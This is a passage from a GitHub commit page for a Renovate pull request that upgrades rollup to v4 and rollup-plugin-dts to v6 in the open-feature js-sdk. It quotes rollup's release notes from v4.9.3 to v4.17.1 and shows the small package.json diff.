Source](https://redirect.github.com/rollup/rollup/compare/v4.17.0...v4.17.1)

*2024-04-29*

##### Bug Fixes

- Prevent infinite recursions for certain constructor invocations
([#&#8203;5500](https://redirect.github.com/rollup/rollup/issues/5500))

##### Pull Requests

- [#&#8203;5500](https://redirect.github.com/rollup/rollup/pull/5500):
fix: parameter variable infinite recursion error
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))

###
[`v4.17.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4170)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.16.4...v4.17.0)

*2024-04-27*

##### Features

- Track function call arguments to optimize functions only called once
or with the same literal values (re-release from 4.16.0)
([#&#8203;5483](https://redirect.github.com/rollup/rollup/issues/5483))

##### Bug Fixes

- Reduce browser WASM size to a fraction by changing optimization
settings
([#&#8203;5494](https://redirect.github.com/rollup/rollup/issues/5494))

##### Pull Requests

- [#&#8203;5483](https://redirect.github.com/rollup/rollup/pull/5483):
feature(fix): function parameter tracking
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))
- [#&#8203;5488](https://redirect.github.com/rollup/rollup/pull/5488):
Report performance in CI
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5489](https://redirect.github.com/rollup/rollup/pull/5489):
Create FUNDING.json
([@&#8203;BenJam](https://redirect.github.com/BenJam))
- [#&#8203;5492](https://redirect.github.com/rollup/rollup/pull/5492):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5493](https://redirect.github.com/rollup/rollup/pull/5493):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5494](https://redirect.github.com/rollup/rollup/pull/5494):
Use opt-level=z for browser wasm
([@&#8203;sapphi-red](https://redirect.github.com/sapphi-red))

###
[`v4.16.4`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4164)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.16.3...v4.16.4)

*2024-04-23*

##### Bug Fixes

- Revert function parameter tracking logic introduced in 4.16.0 to work
on some remaining issues
([#&#8203;5487](https://redirect.github.com/rollup/rollup/issues/5487))

##### Pull Requests

- [#&#8203;5487](https://redirect.github.com/rollup/rollup/pull/5487):
Revert function parameter tracking logic for now
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.16.3`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4163)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.16.2...v4.16.3)

*2024-04-23*

##### Bug Fixes

- Do not optimize IIFEs that have a name and are again referenced inside
their definition
([#&#8203;5486](https://redirect.github.com/rollup/rollup/issues/5486))

##### Pull Requests

- [#&#8203;5486](https://redirect.github.com/rollup/rollup/pull/5486):
fix: only optimize annoymous iife
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))

###
[`v4.16.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4162)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.16.1...v4.16.2)

*2024-04-22*

##### Bug Fixes

- Resolve a situation condition where reassignments of function
parameters were not tracked properly
([#&#8203;5482](https://redirect.github.com/rollup/rollup/issues/5482))
- Make sure that for armv7 packages, only one package is downloaded for
the user (musl or gnu)
([#&#8203;5479](https://redirect.github.com/rollup/rollup/issues/5479))

##### Pull Requests

- [#&#8203;5479](https://redirect.github.com/rollup/rollup/pull/5479):
Add libc field to armv7 packages
([@&#8203;sapphi-red](https://redirect.github.com/sapphi-red))
- [#&#8203;5482](https://redirect.github.com/rollup/rollup/pull/5482):
fix: function parameter reassigned update
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))

###
[`v4.16.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4161)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.16.0...v4.16.1)

*2024-04-21*

##### Bug Fixes

- Fix crash when rendering logical or conditional expressions
([#&#8203;5481](https://redirect.github.com/rollup/rollup/issues/5481))

##### Pull Requests

- [#&#8203;5481](https://redirect.github.com/rollup/rollup/pull/5481):
fix: conditional/logical expression should request a new tree-shaking
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))

###
[`v4.16.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4160)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.15.0...v4.16.0)

*2024-04-21*

##### Features

- Track function call arguments to optimize functions only called once
or with the same literal values
([#&#8203;5443](https://redirect.github.com/rollup/rollup/issues/5443))

##### Pull Requests

- [#&#8203;5443](https://redirect.github.com/rollup/rollup/pull/5443):
feat: improve tree-shaking by propagate const parameter
([@&#8203;liuly0322](https://redirect.github.com/liuly0322),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.15.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4150)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.14.3...v4.15.0)

*2024-04-20*

##### Features

- Add output.importAttributesKey option to select whether to use "with"
or "assert" for import attributes
([#&#8203;5474](https://redirect.github.com/rollup/rollup/issues/5474))

##### Pull Requests

- [#&#8203;5474](https://redirect.github.com/rollup/rollup/pull/5474):
Add ImportAttributesKey to choose keyword ("with" | "assert")
([@&#8203;doubleaa93](https://redirect.github.com/doubleaa93),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5475](https://redirect.github.com/rollup/rollup/pull/5475):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5477](https://redirect.github.com/rollup/rollup/pull/5477):
Try to run emulated smoke tests for Linux environments
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.14.3`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4143)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.14.2...v4.14.3)

*2024-04-15*

##### Bug Fixes

- Support Alpine Linux and other MUSL builds on ARM
([#&#8203;5471](https://redirect.github.com/rollup/rollup/issues/5471))

##### Pull Requests

- [#&#8203;5471](https://redirect.github.com/rollup/rollup/pull/5471):
Add linux arm musl build
([@&#8203;sapphi-red](https://redirect.github.com/sapphi-red))

###
[`v4.14.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4142)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.14.1...v4.14.2)

*2024-04-12*

##### Bug Fixes

- Do not create invalid code when reexporting both a namespace and the
default export from that namespace
([#&#8203;5466](https://redirect.github.com/rollup/rollup/issues/5466))
- Ensure ppc64 platform is properly detected
([#&#8203;5460](https://redirect.github.com/rollup/rollup/issues/5460))

##### Pull Requests

- [#&#8203;5456](https://redirect.github.com/rollup/rollup/pull/5456):
Add high-level architecture documentation
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5460](https://redirect.github.com/rollup/rollup/pull/5460):
Fix ppc64le target
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5463](https://redirect.github.com/rollup/rollup/pull/5463):
chore: tweak the comment about files should not be edited
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5466](https://redirect.github.com/rollup/rollup/pull/5466):
Ensure reexported namespaces do not prevent creation of default export
helpers
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5468](https://redirect.github.com/rollup/rollup/pull/5468):
chore(deps): update dependency eslint-plugin-unicorn to v52
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5469](https://redirect.github.com/rollup/rollup/pull/5469):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5470](https://redirect.github.com/rollup/rollup/pull/5470):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.14.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4141)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.14.0...v4.14.1)

*2024-04-07*

##### Bug Fixes

- Show better error when running on musl Linux where the musl build is
not supported
([#&#8203;5454](https://redirect.github.com/rollup/rollup/issues/5454))

##### Pull Requests

- [#&#8203;5451](https://redirect.github.com/rollup/rollup/pull/5451):
chore: generate string constants from config
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5452](https://redirect.github.com/rollup/rollup/pull/5452):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5453](https://redirect.github.com/rollup/rollup/pull/5453):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5454](https://redirect.github.com/rollup/rollup/pull/5454):
Improve error message when running on unsupported MUSL Linux
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5455](https://redirect.github.com/rollup/rollup/pull/5455):
Remove inlining logic in AST (de-)serializer
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.14.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4140)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.13.2...v4.14.0)

*2024-04-03*

##### Features

- Display error causes in Rollup CLI
([#&#8203;5422](https://redirect.github.com/rollup/rollup/issues/5422))
- Add basic support for explicit resource management via "using" and
"await using"
([#&#8203;5423](https://redirect.github.com/rollup/rollup/issues/5423))

##### Pull Requests

- [#&#8203;5422](https://redirect.github.com/rollup/rollup/pull/5422):
feat: show all cause in Error
([@&#8203;devohda](https://redirect.github.com/devohda),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5444](https://redirect.github.com/rollup/rollup/pull/5444):
feat: support explicit-resource-management
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5445](https://redirect.github.com/rollup/rollup/pull/5445):
docs: add `@shikiji/vitepress-twoslash`
([@&#8203;sapphi-red](https://redirect.github.com/sapphi-red))
- [#&#8203;5447](https://redirect.github.com/rollup/rollup/pull/5447):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5448](https://redirect.github.com/rollup/rollup/pull/5448):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.13.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4132)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.13.1...v4.13.2)

*2024-03-28*

##### Bug Fixes

- Ensure accessing module info is cached after the build phase for
improved performance
([#&#8203;5438](https://redirect.github.com/rollup/rollup/issues/5438))
- Support powerpc64le CPUs
([#&#8203;5350](https://redirect.github.com/rollup/rollup/issues/5350))

##### Pull Requests

- [#&#8203;5350](https://redirect.github.com/rollup/rollup/pull/5350):
Add support for ppc64le
([@&#8203;pavolloffay](https://redirect.github.com/pavolloffay),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5438](https://redirect.github.com/rollup/rollup/pull/5438):
Cache module info getters before output generation
([@&#8203;bluwy](https://redirect.github.com/bluwy),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.13.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4131)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.13.0...v4.13.1)

*2024-03-27*

##### Bug Fixes

- Add new linux-s390x-gnu native binary package
([#&#8203;5346](https://redirect.github.com/rollup/rollup/issues/5346))

##### Pull Requests

- [#&#8203;5346](https://redirect.github.com/rollup/rollup/pull/5346):
Add support for linux s390x gnu
([@&#8203;edlerd](https://redirect.github.com/edlerd))
- [#&#8203;5430](https://redirect.github.com/rollup/rollup/pull/5430):
chore(deps): update dependency
[@&#8203;vue/eslint-config-typescript](https://redirect.github.com/vue/eslint-config-typescript)
to v13 ([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5431](https://redirect.github.com/rollup/rollup/pull/5431):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5432](https://redirect.github.com/rollup/rollup/pull/5432):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5436](https://redirect.github.com/rollup/rollup/pull/5436):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5437](https://redirect.github.com/rollup/rollup/pull/5437):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.13.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4130)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.12.1...v4.13.0)

*2024-03-12*

##### Features

- Ensure that the location of parse errors and other logs is encoded in
the error message as well
([#&#8203;5424](https://redirect.github.com/rollup/rollup/issues/5424))

##### Pull Requests

- [#&#8203;5417](https://redirect.github.com/rollup/rollup/pull/5417):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5418](https://redirect.github.com/rollup/rollup/pull/5418):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5419](https://redirect.github.com/rollup/rollup/pull/5419):
chore: fix typo
([@&#8203;OnlyWick](https://redirect.github.com/OnlyWick))
- [#&#8203;5424](https://redirect.github.com/rollup/rollup/pull/5424):
Add locations to logs, warnings and error messages (
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.12.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4121)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.12.0...v4.12.1)

*2024-03-06*

##### Bug Fixes

- Escape special characters in file references
([#&#8203;5404](https://redirect.github.com/rollup/rollup/issues/5404))

##### Pull Requests

- [#&#8203;5398](https://redirect.github.com/rollup/rollup/pull/5398):
Rename `getRollupEror` to `getRollupError`
([@&#8203;MrRefactoring](https://redirect.github.com/MrRefactoring))
- [#&#8203;5399](https://redirect.github.com/rollup/rollup/pull/5399):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5404](https://redirect.github.com/rollup/rollup/pull/5404):
fix: escape ids in `import.meta.ROLLUP_FILE_URL_referenceId` correctly
([@&#8203;sapphi-red](https://redirect.github.com/sapphi-red))
- [#&#8203;5406](https://redirect.github.com/rollup/rollup/pull/5406):
chore(deps): lock file maintenance minor/patch updates (
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5407](https://redirect.github.com/rollup/rollup/pull/5407):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5411](https://redirect.github.com/rollup/rollup/pull/5411):
Chunk assignment - Fix comment line breaks and typo
([@&#8203;yoavweiss](https://redirect.github.com/yoavweiss),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.12.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4120)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.11.0...v4.12.0)

*2024-02-16*

##### Features

- Improve raw bundling performance by 10-15% when not using the cache or
plugins that return an AST
([#&#8203;5391](https://redirect.github.com/rollup/rollup/issues/5391))

##### Pull Requests

- [#&#8203;5391](https://redirect.github.com/rollup/rollup/pull/5391):
Improve performance by directly constructing AST from buffer
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5393](https://redirect.github.com/rollup/rollup/pull/5393):
chore(deps): update dependency eslint-plugin-unicorn to v51
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5394](https://redirect.github.com/rollup/rollup/pull/5394):
chore(deps): update typescript-eslint monorepo to v7 (major)
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5395](https://redirect.github.com/rollup/rollup/pull/5395):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.11.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4110)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.10.0...v4.11.0)

*2024-02-15*

##### Features

- Add `output.reexportProtoFromExternal` option to disable special code
for handling `__proto__` reexports
([#&#8203;5380](https://redirect.github.com/rollup/rollup/issues/5380))

##### Bug Fixes

- Ensure namespace reexport code can be parsed by cjs-module-lexer
([#&#8203;5380](https://redirect.github.com/rollup/rollup/issues/5380))
- Throw when trying to reassing `const` variables
([#&#8203;5388](https://redirect.github.com/rollup/rollup/issues/5388))

##### Pull Requests

- [#&#8203;5380](https://redirect.github.com/rollup/rollup/pull/5380):
fix: separately export `__proto__` for compatibility with CJS Transpiler
Re-exports ([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5388](https://redirect.github.com/rollup/rollup/pull/5388):
Add const reassign rule
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))

###
[`v4.10.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4100)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.9.6...v4.10.0)

*2024-02-10*

##### Features

- Support base-36 and base-16 hashes again via new
`output.hashCharacters` option
([#&#8203;5371](https://redirect.github.com/rollup/rollup/issues/5371))

##### Bug Fixes

- Do not crash process for panics in native code but throw them as
JavaScript errors
([#&#8203;5383](https://redirect.github.com/rollup/rollup/issues/5383))

##### Pull Requests

- [#&#8203;5359](https://redirect.github.com/rollup/rollup/pull/5359):
chore(deps): update actions/cache action to v4
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5360](https://redirect.github.com/rollup/rollup/pull/5360):
chore(deps): update dependency pretty-ms to v9
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5366](https://redirect.github.com/rollup/rollup/pull/5366):
chore(deps): update dependency husky to v9
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5367](https://redirect.github.com/rollup/rollup/pull/5367):
chore(deps): update peter-evans/create-or-update-comment action to v4
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5368](https://redirect.github.com/rollup/rollup/pull/5368):
chore(deps): update peter-evans/find-comment action to v3
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5369](https://redirect.github.com/rollup/rollup/pull/5369):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5370](https://redirect.github.com/rollup/rollup/pull/5370):
Fix dependency range for Node types
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5371](https://redirect.github.com/rollup/rollup/pull/5371):
Implement "output.hashCharacters" option to define character set for
file hashes
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5372](https://redirect.github.com/rollup/rollup/pull/5372):
Roll back vitepress as 1.0.0-rc.40 breaks the development build
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5382](https://redirect.github.com/rollup/rollup/pull/5382):
Update documentation
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5383](https://redirect.github.com/rollup/rollup/pull/5383):
Catch Rust panics and then throw them in JS
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5384](https://redirect.github.com/rollup/rollup/pull/5384):
chore(deps): update codecov/codecov-action action to v4
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5385](https://redirect.github.com/rollup/rollup/pull/5385):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5386](https://redirect.github.com/rollup/rollup/pull/5386):
Resolve all rollup imports to node_modules to avoid type conflict
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))

###
[`v4.9.6`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#496)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.9.5...v4.9.6)

*2024-01-21*

##### Bug Fixes

- Detect side effects when an element that was pushed into an array is
modified via the array
([#&#8203;5352](https://redirect.github.com/rollup/rollup/issues/5352))

##### Pull Requests

- [#&#8203;5337](https://redirect.github.com/rollup/rollup/pull/5337):
Generate AST transformers from config
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5340](https://redirect.github.com/rollup/rollup/pull/5340):
Also type-check d.ts files
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5348](https://redirect.github.com/rollup/rollup/pull/5348):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5351](https://redirect.github.com/rollup/rollup/pull/5351):
chore(deps): update dependency vite to v5.0.12 \[security]
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5352](https://redirect.github.com/rollup/rollup/pull/5352):
Track mutations of elements pushed into arrays
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.9.5`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#495)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.9.4...v4.9.5)

*2024-01-12*

##### Bug Fixes

- Fix issue where on Windows, Rollup would not load due to problems with
the MSVC executable
([#&#8203;5335](https://redirect.github.com/rollup/rollup/issues/5335))

##### Pull Requests

- [#&#8203;5334](https://redirect.github.com/rollup/rollup/pull/5334):
Fix typo in commondir.ts
([@&#8203;akiomik](https://redirect.github.com/akiomik))
- [#&#8203;5335](https://redirect.github.com/rollup/rollup/pull/5335):
build: static link msvc runtime on Windows x64 platform
([@&#8203;Brooooooklyn](https://redirect.github.com/Brooooooklyn))
- [#&#8203;5338](https://redirect.github.com/rollup/rollup/pull/5338):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.9.4`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#494)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.9.3...v4.9.4)

*2024-01-06*

##### Bug Fixes

- Use quotes for keys in namespaces that are only numbers but are not
valid integers
([#&#8203;5328](https://redirect.github.com/rollup/rollup/issues/5328))
- Allow to have comments between pure annotations and the annoted node
([#&#8203;5332](https://redirect.github.com/rollup/rollup/issues/5332))

##### Pull Requests

- [#&#8203;5328](https://redirect.github.com/rollup/rollup/pull/5328):
Correctly handling number key
([@&#8203;LongTengDao](https://redirect.github.com/LongTengDao))
- [#&#8203;5332](https://redirect.github.com/rollup/rollup/pull/5332):
Handle pure annotations that are separated by a comment
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.9.3`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#493)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.9.2...v4.9.3)

*2024-01-05*

##### Bug Fixes

- Support `__proto__` as export/import name
([#&#8203;5313](https://redirect.github.com/rollup/rollup/issues/5313))
- Use ESTree AST type over custom type in user-facing types
([#&#8203;5323](https://redirect.github.com/rollup/rollup/issues/5323))

##### Pull Requests

- [#&#8203;5313](https://redirect.github.com/rollup/rollup/pull/5313):
Correctly handling **proto** export as module object key
([@&#8203;LongTengDao](https://redirect.github.com/LongTengDao))
- [#&#8203;5323](https://redirect.github.com/rollup/rollup/pull/5323):
fix: Add estree.Program type to rollup.d.ts
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5326](https://redirect.github.com/rollup/rollup/pull/5326):
docs: fix grammar
([@&#8203;gigabites19](https://redirect.github.com/gigabites19))
- [#&#8203;5329](https://redirect.github.com/rollup/rollup/pull/5329):
chore(deps): update dependency
[@&#8203;vue/eslint-config-prettier](https://redirect.github.com/vue/eslint-config-prettier)
to v9 (

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/open-feature/js-sdk).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->

---------

Signed-off-by: Todd Baert <[email protected]>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Todd Baert <[email protected]>
  • Loading branch information
renovate[bot] and toddbaert authored Oct 21, 2024
1 parent def3fe8 commit 0a99a01
Show file tree
Hide file tree
Showing 2 changed files with 89 additions and 135 deletions.
220 changes: 87 additions & 133 deletions package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

4 changes: 2 additions & 2 deletions package.json
Original file line number Diff line number Diff line change
Expand Up @@ -62,8 +62,8 @@
"ng-packagr": "^17.3.0",
"prettier": "^3.2.5",
"react": "^18.2.0",
"rollup": "^3.29.4",
"rollup-plugin-dts": "^5.3.1",
"rollup": "^4.0.0",
"rollup-plugin-dts": "^6.1.1",
"rxjs": "~7.8.0",
"shx": "^0.3.4",
"ts-jest": "^29.1.2",
Expand Down

0 comments on commit 0a99a01

Please sign in to comment.